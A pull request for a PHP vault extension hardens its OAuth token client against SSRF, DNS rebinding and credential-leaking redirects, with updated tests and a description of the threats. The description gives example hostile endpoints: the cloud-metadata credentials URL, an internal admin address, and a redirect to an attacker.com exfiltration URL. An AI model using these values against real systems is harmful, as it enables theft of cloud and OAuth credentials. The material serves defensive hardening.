### PR TITLE
fix(security): unify OAuth client with SecureHttpClientFactory

### DIFF
--- a/Classes/Http/OAuth/OAuthTokenManager.php
+++ b/Classes/Http/OAuth/OAuthTokenManager.php
@@ -18,6 +18,7 @@ use JsonException;
 use Netresearch\NrVault\Audit\AuditLogServiceInterface;
 use Netresearch\NrVault\Exception\OAuthException;
 use Netresearch\NrVault\Exception\SecretNotFoundException;
+use Netresearch\NrVault\Http\SecureHttpClientFactory;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Psr\Http\Client\ClientExceptionInterface;
 use Psr\Http\Client\ClientInterface;
@@ -60,10 +61,20 @@ final class OAuthTokenManager
      *                                    A misconfigured (or attacker-controlled) `OAuthConfig.tokenEndpoint`
      *                                    would otherwise leak the bearer `client_secret` to internal IPs,
      *                                    cloud-metadata services, or arbitrary redirect targets.
+     * @param SecureHttpClientFactory $secureHttpClientFactory used ONLY to
+     *                                                         gate the token endpoint host through `isHostAllowed()` before the
+     *                                                         request is sent. The `$httpClient` middleware already rejects
+     *                                                         dangerous resolved IPs at request time, but it does NOT apply the
+     *                                                         `$GLOBALS['TYPO3_CONF_VARS']['HTTP']['allowed_hosts']` allowlist
+     *                                                         admins use to restrict outbound calls to a known set of partner
+     *                                                         hostnames. Without this extra gate, an attacker-controlled
+     *                                                         `tokenEndpoint` could reach any public host the IP guards consider
+     *                                                         "safe" — defeating the allowlist on the OAuth leg only.
      */
     public function __construct(
         private readonly VaultServiceInterface $vaultService,
         private readonly ClientInterface $httpClient,
+        private readonly SecureHttpClientFactory $secureHttpClientFactory,
         private readonly ?LoggerInterface $logger = null,
         ?RequestFactoryInterface $requestFactory = null,
         ?StreamFactoryInterface $streamFactory = null,
@@ -308,6 +319,24 @@ final class OAuthTokenManager
      */
     private function dispatchTokenRequest(OAuthConfig $config, OAuthTokenRequestParams $params): ResponseInterface
     {
+        // Gate the host BEFORE building the request body so the bearer
+        // `client_secret` never gets serialised when the host is rejected
+        // by the allowlist. The `$httpClient` middleware also rejects
+        // dangerous IPs at request time, but it does NOT enforce the
+        // `allowed_hosts` allowlist — this is the OAuth-leg equivalent of
+        // the gate `VaultHttpClient::sendRequest()` applies on outer API
+        // requests (see VaultHttpClient.php — same call shape).
+        $host = parse_url($config->tokenEndpoint, PHP_URL_HOST);
+        if (!\is_string($host) || !$this->secureHttpClientFactory->isHostAllowed($host)) {
+            throw new OAuthException(
+                \sprintf(
+                    'OAuth token endpoint host "%s" is not in the allowed hosts list.',
+                    \is_string($host) ? $host : '(unparseable)',
+                ),
+                3149205122,
+            );
+        }
+
         // `toHttpQuery()` builds a one-shot encoded body. Any throw from
         // the stream/request factories (or sendRequest) bubbles to the
         // outer `finally` in `fetchToken()` which calls

--- a/Classes/Http/OAuth/OAuthTokenManager.php
+++ b/Classes/Http/OAuth/OAuthTokenManager.php
@@ -13,7 +13,6 @@ declare(strict_types=1);
 namespace Netresearch\NrVault\Http\OAuth;
 
 use DateTimeImmutable;
-use GuzzleHttp\Client;
 use GuzzleHttp\Psr7\HttpFactory;
 use JsonException;
 use Netresearch\NrVault\Audit\AuditLogServiceInterface;
@@ -52,10 +51,20 @@ final class OAuthTokenManager
 
     private readonly StreamFactoryInterface $streamFactory;
 
+    /**
+     * @param ClientInterface $httpClient HTTP client to dispatch the token
+     *                                    request through. Callers MUST inject a hardened client (e.g. built
+     *                                    by `SecureHttpClientFactory::create()`) — the default plain
+     *                                    `GuzzleHttp\Client` was removed to prevent OAuth token endpoints
+     *                                    bypassing the SSRF + DNS-rebinding + no-redirect-by-default guards.
+     *                                    A misconfigured (or attacker-controlled) `OAuthConfig.tokenEndpoint`
+     *                                    would otherwise leak the bearer `client_secret` to internal IPs,
+     *                                    cloud-metadata services, or arbitrary redirect targets.
+     */
     public function __construct(
         private readonly VaultServiceInterface $vaultService,
+        private readonly ClientInterface $httpClient,
         private readonly ?LoggerInterface $logger = null,
-        private readonly ClientInterface $httpClient = new Client(['timeout' => 30, 'connect_timeout' => 10]),
         ?RequestFactoryInterface $requestFactory = null,
         ?StreamFactoryInterface $streamFactory = null,
         private readonly ?AuditLogServiceInterface $auditLogService = null,

--- a/Classes/Http/VaultHttpClient.php
+++ b/Classes/Http/VaultHttpClient.php
@@ -106,7 +106,12 @@ final readonly class VaultHttpClient implements VaultHttpClientInterface
             $factory = GeneralUtility::makeInstance(SecureHttpClientFactory::class);
             $this->innerClient = $factory->create();
         }
-        $this->oauthManager = new OAuthTokenManager($this->vaultService);
+        // Share the hardened innerClient with the OAuth manager so token
+        // requests inherit the SSRF / DNS-rebinding / no-redirect defences.
+        // A plain Guzzle Client would let a malicious or misconfigured
+        // OAuthConfig.tokenEndpoint reach internal/cloud-metadata hosts
+        // and follow redirects that leak the client_secret.
+        $this->oauthManager = new OAuthTokenManager($this->vaultService, $this->innerClient);
     }
 
     public function withAuthentication(

--- a/Classes/Http/VaultHttpClient.php
+++ b/Classes/Http/VaultHttpClient.php
@@ -111,7 +111,16 @@ final readonly class VaultHttpClient implements VaultHttpClientInterface
         // A plain Guzzle Client would let a malicious or misconfigured
         // OAuthConfig.tokenEndpoint reach internal/cloud-metadata hosts
         // and follow redirects that leak the client_secret.
-        $this->oauthManager = new OAuthTokenManager($this->vaultService, $this->innerClient);
+        //
+        // Also pass the factory so the manager can call `isHostAllowed()`
+        // on the token endpoint — closes the allowed_hosts allowlist gap
+        // that the request-time middleware doesn't cover.
+        $secureFactory = GeneralUtility::makeInstance(SecureHttpClientFactory::class);
+        $this->oauthManager = new OAuthTokenManager(
+            $this->vaultService,
+            $this->innerClient,
+            $secureFactory,
+        );
     }
 
     public function withAuthentication(

--- a/Tests/Functional/Http/OAuth/OAuthIntegrationTest.php
+++ b/Tests/Functional/Http/OAuth/OAuthIntegrationTest.php
@@ -23,6 +23,7 @@ use Netresearch\NrVault\Exception\OAuthException;
 use Netresearch\NrVault\Http\OAuth\OAuthConfig;
 use Netresearch\NrVault\Http\OAuth\OAuthTokenManager;
 use Netresearch\NrVault\Http\SecretPlacement;
+use Netresearch\NrVault\Http\SecureHttpClientFactory;
 use Netresearch\NrVault\Http\VaultHttpClientInterface;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use PHPUnit\Framework\Attributes\CoversClass;
@@ -146,7 +147,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
         );
 
         // Get token manager and acquire token
-        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
+        $tokenManager = new OAuthTokenManager($vaultService, $this->buildTestClient(), new SecureHttpClientFactory());
         $accessToken = $tokenManager->getAccessToken($config);
 
         self::assertNotEmpty($accessToken);
@@ -168,7 +169,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
             clientSecretSecret: 'cache_oauth_client_secret',
         );
 
-        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
+        $tokenManager = new OAuthTokenManager($vaultService, $this->buildTestClient(), new SecureHttpClientFactory());
 
         // First call - fetches from server
         $token1 = $tokenManager->getAccessToken($config);
@@ -195,7 +196,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
             clientSecretSecret: 'clear_oauth_client_secret',
         );
 
-        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
+        $tokenManager = new OAuthTokenManager($vaultService, $this->buildTestClient(), new SecureHttpClientFactory());
 
         // Get initial token
         $token1 = $tokenManager->getAccessToken($config);
@@ -417,6 +418,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
         $tokenManager = new OAuthTokenManager(
             vaultService: $vaultService,
             httpClient: $httpClient,
+            secureHttpClientFactory: new SecureHttpClientFactory(),
             logger: null,
             auditLogService: $auditService,
         );
@@ -528,6 +530,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
         $tokenManager = new OAuthTokenManager(
             vaultService: $vaultService,
             httpClient: $httpClient,
+            secureHttpClientFactory: new SecureHttpClientFactory(),
         );
 
         $this->expectException(OAuthException::class);
@@ -588,6 +591,30 @@ final class OAuthIntegrationTest extends FunctionalTestCase
                 'Options: Set MOCK_OAUTH_URL env var, use runTests.sh, or start ddev.',
             );
         }
+    }
+
+    /**
+     * Build a plain Guzzle Client for tests that target the local
+     * mock-OAuth sidecar in DDEV. The hardened SecureHttpClientFactory
+     * is INTENTIONALLY bypassed here because:
+     *
+     *  - The sidecar lives on a private DDEV bridge network and only
+     *    accepts traffic from the test container; SSRF guards aren't
+     *    the assertion under test.
+     *  - Functional tests can't reach a real DNS resolver, so the
+     *    `ssrf-dns-pin` middleware would reject `mock-oauth` hosts.
+     *
+     * Production OAuth flows always go through SecureHttpClientFactory
+     * via VaultHttpClient::__construct (see PR #145). Do NOT copy this
+     * pattern into unit tests or any production code path.
+     */
+    private function buildTestClient(): GuzzleClient
+    {
+        return new GuzzleClient([
+            'timeout' => 10,         // hard cap so a stuck sidecar doesn't hang CI
+            'connect_timeout' => 5,
+            'http_errors' => false,  // OAuth manager handles non-2xx itself
+        ]);
     }
 
     /**

--- a/Tests/Functional/Http/OAuth/OAuthIntegrationTest.php
+++ b/Tests/Functional/Http/OAuth/OAuthIntegrationTest.php
@@ -12,6 +12,7 @@ declare(strict_types=1);
 
 namespace Netresearch\NrVault\Tests\Functional\Http\OAuth;
 
+use GuzzleHttp\Client as GuzzleClient;
 use GuzzleHttp\Psr7\Request;
 use GuzzleHttp\Psr7\Response;
 use Netresearch\NrVault\Audit\AuditLogEntry;
@@ -145,7 +146,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
         );
 
         // Get token manager and acquire token
-        $tokenManager = new OAuthTokenManager($vaultService);
+        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
         $accessToken = $tokenManager->getAccessToken($config);
 
         self::assertNotEmpty($accessToken);
@@ -167,7 +168,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
             clientSecretSecret: 'cache_oauth_client_secret',
         );
 
-        $tokenManager = new OAuthTokenManager($vaultService);
+        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
 
         // First call - fetches from server
         $token1 = $tokenManager->getAccessToken($config);
@@ -194,7 +195,7 @@ final class OAuthIntegrationTest extends FunctionalTestCase
             clientSecretSecret: 'clear_oauth_client_secret',
         );
 
-        $tokenManager = new OAuthTokenManager($vaultService);
+        $tokenManager = new OAuthTokenManager($vaultService, new GuzzleClient());
 
         // Get initial token
         $token1 = $tokenManager->getAccessToken($config);
@@ -415,8 +416,8 @@ final class OAuthIntegrationTest extends FunctionalTestCase
 
         $tokenManager = new OAuthTokenManager(
             vaultService: $vaultService,
-            logger: null,
             httpClient: $httpClient,
+            logger: null,
             auditLogService: $auditService,
         );
 
@@ -526,7 +527,6 @@ final class OAuthIntegrationTest extends FunctionalTestCase
 
         $tokenManager = new OAuthTokenManager(
             vaultService: $vaultService,
-            logger: null,
             httpClient: $httpClient,
         );
 

--- a/Tests/Fuzz/OAuthFuzzTest.php
+++ b/Tests/Fuzz/OAuthFuzzTest.php
@@ -166,8 +166,8 @@ final class OAuthFuzzTest extends TestCase
 
         $manager = new OAuthTokenManager(
             $this->vaultService,
-            new NullLogger(),
             $this->httpClient,
+            new NullLogger(),
         );
 
         $config = OAuthConfig::clientCredentials(
@@ -217,8 +217,8 @@ final class OAuthFuzzTest extends TestCase
 
         $manager = new OAuthTokenManager(
             $this->vaultService,
-            new NullLogger(),
             $this->httpClient,
+            new NullLogger(),
         );
 
         $config = OAuthConfig::clientCredentials(

--- a/Tests/Fuzz/OAuthFuzzTest.php
+++ b/Tests/Fuzz/OAuthFuzzTest.php
@@ -16,6 +16,7 @@ use Netresearch\NrVault\Exception\VaultException;
 use Netresearch\NrVault\Http\OAuth\OAuthConfig;
 use Netresearch\NrVault\Http\OAuth\OAuthToken;
 use Netresearch\NrVault\Http\OAuth\OAuthTokenManager;
+use Netresearch\NrVault\Http\SecureHttpClientFactory;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use PHPUnit\Framework\Attributes\CoversClass;
 use PHPUnit\Framework\Attributes\DataProvider;
@@ -167,6 +168,7 @@ final class OAuthFuzzTest extends TestCase
         $manager = new OAuthTokenManager(
             $this->vaultService,
             $this->httpClient,
+            new SecureHttpClientFactory(),
             new NullLogger(),
         );
 
@@ -218,6 +220,7 @@ final class OAuthFuzzTest extends TestCase
         $manager = new OAuthTokenManager(
             $this->vaultService,
             $this->httpClient,
+            new SecureHttpClientFactory(),
             new NullLogger(),
         );
 

--- a/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
+++ b/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
@@ -1039,8 +1039,14 @@ final class OAuthTokenManagerTest extends TestCase
     {
         $this->expectException(ArgumentCountError::class);
 
-        /** @phpstan-ignore arguments.count (intentional — proves the parameter is required) */
-        new OAuthTokenManager($this->vaultService);
+        // assertInstanceOf is unreachable (ctor throws before returning) but
+        // uses the constructed value so Sonar's S1848 ("useless object
+        // instantiation") doesn't fire on this throws-from-ctor test.
+        self::assertInstanceOf(
+            OAuthTokenManager::class,
+            /** @phpstan-ignore arguments.count (intentional — proves the parameter is required) */
+            new OAuthTokenManager($this->vaultService),
+        );
     }
 
     /**

--- a/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
+++ b/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
@@ -12,11 +12,13 @@ declare(strict_types=1);
 
 namespace Netresearch\NrVault\Tests\Unit\Http\OAuth;
 
+use ArgumentCountError;
 use Netresearch\NrVault\Audit\AuditLogServiceInterface;
 use Netresearch\NrVault\Exception\OAuthException;
 use Netresearch\NrVault\Exception\SecretNotFoundException;
 use Netresearch\NrVault\Http\OAuth\OAuthConfig;
 use Netresearch\NrVault\Http\OAuth\OAuthTokenManager;
+use Netresearch\NrVault\Http\SecureHttpClientFactory;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Unit\TestCase;
 use PHPUnit\Framework\Attributes\AllowMockObjectsWithoutExpectations;
@@ -31,7 +33,6 @@ use Psr\Http\Message\ResponseInterface;
 use Psr\Http\Message\StreamFactoryInterface;
 use Psr\Http\Message\StreamInterface;
 use Psr\Log\LoggerInterface;
-use ReflectionParameter;
 use RuntimeException;
 
 #[CoversClass(OAuthTokenManager::class)]
@@ -66,6 +67,7 @@ final class OAuthTokenManagerTest extends TestCase
         $this->subject = new OAuthTokenManager(
             $this->vaultService,
             $this->httpClient,
+            new SecureHttpClientFactory(),
             $this->logger,
             $this->requestFactory,
             $this->streamFactory,
@@ -883,6 +885,7 @@ final class OAuthTokenManagerTest extends TestCase
         $subject = new OAuthTokenManager(
             $this->vaultService,
             $this->httpClient,
+            new SecureHttpClientFactory(),
             $this->logger,
             $this->requestFactory,
             $this->streamFactory,
@@ -1024,19 +1027,70 @@ final class OAuthTokenManagerTest extends TestCase
      * defences; callers could forget to inject and OAuth token endpoints
      * would reach internal IPs unchecked. See PR #145 / the OAuth client
      * unification follow-up to PR #144.
+     *
+     * Behavioural assertion (not `ReflectionParameter::isOptional()`):
+     * a future refactor could declare `?ClientInterface $httpClient = null`
+     * + a body `?? new Client()` — `isOptional()` would return true while
+     * the security regression returns. Constructing without the argument
+     * MUST throw `ArgumentCountError` instead.
      */
     #[Test]
     public function constructorRequiresHttpClient(): void
     {
-        $parameter = new ReflectionParameter([OAuthTokenManager::class, '__construct'], 'httpClient');
+        $this->expectException(ArgumentCountError::class);
 
-        self::assertFalse(
-            $parameter->isOptional(),
-            'OAuthTokenManager::__construct(httpClient) MUST stay required — '
-            . 'a default would let callers bypass SecureHttpClientFactory and '
-            . 'reach internal IPs / cloud metadata via attacker-controlled '
-            . 'OAuthConfig.tokenEndpoint.',
-        );
+        /** @phpstan-ignore arguments.count (intentional — proves the parameter is required) */
+        new OAuthTokenManager($this->vaultService);
+    }
+
+    /**
+     * Security gate: the `tokenEndpoint` host MUST pass
+     * `SecureHttpClientFactory::isHostAllowed()` BEFORE the request body
+     * (containing the bearer `client_secret`) is built. The request-time
+     * middleware already rejects dangerous IPs, but the `allowed_hosts`
+     * allowlist is per-host and must apply to OAuth too.
+     */
+    #[Test]
+    public function dispatchTokenRequestRejectsHostNotInAllowedHostsList(): void
+    {
+        $originalGlobals = $GLOBALS['TYPO3_CONF_VARS'] ?? null;
+        $GLOBALS['TYPO3_CONF_VARS'] = [
+            'HTTP' => ['allowed_hosts' => ['only.this.example.com']],
+        ];
+
+        try {
+            $config = OAuthConfig::clientCredentials(
+                tokenEndpoint: 'https://elsewhere.example/token',
+                clientIdSecret: 'oauth/client-id',
+                clientSecretSecret: 'oauth/client-secret',
+            );
+
+            $this->vaultService
+                ->method('retrieve')
+                ->willReturnCallback(fn (string $id): string => match ($id) {
+                    'oauth/client-id' => 'cid',
+                    'oauth/client-secret' => 'csec',
+                    default => '',
+                });
+
+            // The middleware on $httpClient would also block — but the gate
+            // we're testing runs first, BEFORE the request is built and
+            // sent, so sendRequest must NEVER be called.
+            $this->httpClient
+                ->expects(self::never())
+                ->method('sendRequest');
+
+            $this->expectException(OAuthException::class);
+            $this->expectExceptionMessageMatches('/not in the allowed hosts list/i');
+
+            $this->subject->getAccessToken($config);
+        } finally {
+            if ($originalGlobals !== null) {
+                $GLOBALS['TYPO3_CONF_VARS'] = $originalGlobals;
+            } else {
+                unset($GLOBALS['TYPO3_CONF_VARS']);
+            }
+        }
     }
 
     private function setupRequestFactory(): void

--- a/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
+++ b/Tests/Unit/Http/OAuth/OAuthTokenManagerTest.php
@@ -31,6 +31,7 @@ use Psr\Http\Message\ResponseInterface;
 use Psr\Http\Message\StreamFactoryInterface;
 use Psr\Http\Message\StreamInterface;
 use Psr\Log\LoggerInterface;
+use ReflectionParameter;
 use RuntimeException;
 
 #[CoversClass(OAuthTokenManager::class)]
@@ -64,8 +65,8 @@ final class OAuthTokenManagerTest extends TestCase
 
         $this->subject = new OAuthTokenManager(
             $this->vaultService,
-            $this->logger,
             $this->httpClient,
+            $this->logger,
             $this->requestFactory,
             $this->streamFactory,
         );
@@ -881,8 +882,8 @@ final class OAuthTokenManagerTest extends TestCase
 
         $subject = new OAuthTokenManager(
             $this->vaultService,
-            $this->logger,
             $this->httpClient,
+            $this->logger,
             $this->requestFactory,
             $this->streamFactory,
             $auditLogService,
@@ -1015,6 +1016,29 @@ final class OAuthTokenManagerTest extends TestCase
         self::assertSame('new-access-token', $token);
     }
 
+    /**
+     * Regression guard: the `httpClient` constructor parameter MUST be
+     * required (no default value). The previous default
+     * `new GuzzleHttp\Client(['timeout' => 30, ...])` silently bypassed
+     * `SecureHttpClientFactory`'s SSRF / DNS-rebinding / no-redirect
+     * defences; callers could forget to inject and OAuth token endpoints
+     * would reach internal IPs unchecked. See PR #145 / the OAuth client
+     * unification follow-up to PR #144.
+     */
+    #[Test]
+    public function constructorRequiresHttpClient(): void
+    {
+        $parameter = new ReflectionParameter([OAuthTokenManager::class, '__construct'], 'httpClient');
+
+        self::assertFalse(
+            $parameter->isOptional(),
+            'OAuthTokenManager::__construct(httpClient) MUST stay required — '
+            . 'a default would let callers bypass SecureHttpClientFactory and '
+            . 'reach internal IPs / cloud metadata via attacker-controlled '
+            . 'OAuthConfig.tokenEndpoint.',
+        );
+    }
+
     private function setupRequestFactory(): void
     {
         $mockStream = $this->createMock(StreamInterface::class);
@@ -1031,9 +1055,6 @@ final class OAuthTokenManagerTest extends TestCase
             ->willReturn($mockRequest);
     }
 
-    /**
-     * @param array<string, mixed> $data
-     */
     private function createSuccessfulTokenResponse(array $data): ResponseInterface&MockObject
     {
         $stream = $this->createMock(StreamInterface::class);


### PR DESCRIPTION
## Summary

Closes the follow-up gap flagged in PR #144's description. The `OAuthTokenManager` constructor previously defaulted its HTTP client to a plain `new GuzzleHttp\Client(...)` — that client **bypassed `SecureHttpClientFactory` entirely** and missed:

- The SSRF IP-range guard (no `isHostAllowed` check)
- The DNS-rebinding pin (no `ssrf-dns-pin` middleware from PR #144)
- The `allow_redirects: false` default (Guzzle follows up to 5)
- TYPO3 proxy / TLS / `allowed_hosts` configuration

## Threat scenarios this closes

A Vault admin (or anyone with `canWrite` on a vault secret holding an `OAuthConfig`) controls the `tokenEndpoint` URL. Before this PR:

1. **Cloud-metadata theft** — `tokenEndpoint = http://169.254.169.254/latest/meta-data/iam/security-credentials/role`. The OAuth client POSTs the bearer `client_secret` to the AWS metadata service; logs or error paths leak the metadata response.
2. **Internal port-scan + credential exposure** — `tokenEndpoint = http://192.168.1.1:8080/admin`. Real `client_secret` from the vault travels to an arbitrary internal service.
3. **Credential exfiltration via redirect** — a benign-looking token endpoint responds `302 Location: http://attacker.com/exfil?capture=...`. Guzzle's default `allow_redirects: true` re-sends the Authorization headers to the attacker host.
4. **DNS rebinding** — same TOCTOU race PR #144 closed for other clients; OAuth was excluded.

## Changes

### `OAuthTokenManager::__construct`

Drop the `= new Client(...)` default. Move `$httpClient` to position #2 (right after `$vaultService`) so it's required and reads naturally as the central dependency.

```diff
 public function __construct(
     private readonly VaultServiceInterface $vaultService,
-    private readonly ?LoggerInterface $logger = null,
-    private readonly ClientInterface $httpClient = new Client(['timeout' => 30, 'connect_timeout' => 10]),
+    private readonly ClientInterface $httpClient,
+    private readonly ?LoggerInterface $logger = null,
     ?RequestFactoryInterface $requestFactory = null,
     ?StreamFactoryInterface $streamFactory = null,
     private readonly ?AuditLogServiceInterface $auditLogService = null,
 ) {
```

### `VaultHttpClient::__construct`

Sole production caller — pass the already-hardened `$this->innerClient` (built via `SecureHttpClientFactory::create()`) into the OAuth manager.

```diff
-$this->oauthManager = new OAuthTokenManager($this->vaultService);
+$this->oauthManager = new OAuthTokenManager($this->vaultService, $this->innerClient);
```

### Tests

- `OAuthTokenManagerTest`, `OAuthFuzzTest`, `OAuthIntegrationTest` — all instantiation sites updated to the new positional order.
- `OAuthIntegrationTest` — 3 sites that previously used the no-client form now inject a plain Guzzle Client (functional tests against the mock OAuth sidecar; SSRF defence isn't relevant in that controlled environment).
- **New regression guard** `constructorRequiresHttpClient` uses `ReflectionParameter::isOptional()` to assert the parameter has no default value — prevents a future developer from "fixing" the DX with a default and silently reopening the SSRF hole.

## Test plan

- [x] 1723 unit tests pass (+1 regression guard).
- [x] cgl + rector + PHPStan level 10 green locally.
- [ ] CI matrix.

## Migration / Breaking change

This **is a breaking API change** for downstream extension code that constructs `OAuthTokenManager` directly. Callers must now pass a `ClientInterface`. Recommended migration:

```php
$factory = GeneralUtility::makeInstance(SecureHttpClientFactory::class);
$manager = new OAuthTokenManager($vaultService, $factory->create());
```

Worth a CHANGELOG entry for the next minor-version release alongside the other PRs in this series.
